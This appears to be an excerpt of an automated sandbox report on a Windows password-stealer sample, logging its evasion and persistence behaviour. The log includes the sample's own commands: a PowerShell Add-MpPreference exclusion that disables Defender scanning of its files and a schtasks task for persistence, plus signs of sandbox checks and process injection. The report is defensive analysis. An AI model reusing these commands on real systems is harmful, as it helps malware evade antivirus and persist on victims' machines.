                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe PID: 7352, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: pNYyTm.exe PID: 8164, type: MEMORYSTR
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeMemory allocated: 1440000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeMemory allocated: 2E80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeMemory allocated: 4E80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeMemory allocated: 62E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeMemory allocated: 72E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeMemory allocated: 7520000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeMemory allocated: 8520000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeMemory allocated: A90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeMemory allocated: 2730000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeMemory allocated: 2660000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeMemory allocated: 19C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeMemory allocated: 33C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeMemory allocated: 66B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeMemory allocated: 76B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeMemory allocated: 66B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeMemory allocated: 1270000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeMemory allocated: 3050000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeMemory allocated: 1810000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7246Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 483Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8291Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 543Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeWindow / User API: threadDelayed 4439Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeWindow / User API: threadDelayed 5368Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe TID: 7384Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8140Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8040Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe TID: 2968Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exe TID: 8184Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exe TID: 2112Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeThread delayed: delay time: 922337203685477
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 0000000E.00000002.3722141576.0000000000BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000002.1315775861.0000000005F39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: pNYyTm.exe, 0000000F.00000002.1371407979.0000000005CB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000002.1315775861.0000000005F39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pNYyTm.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pNYyTm.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeMemory written: C:\Users\user\AppData\Roaming\pNYyTm.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pNYyTm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp6051.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\pNYyTm.exeProcess created: C:\Users\user\AppData\Roaming\pNYyTm.exe "C:\Users\user\AppData\Roaming\pNYyTm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
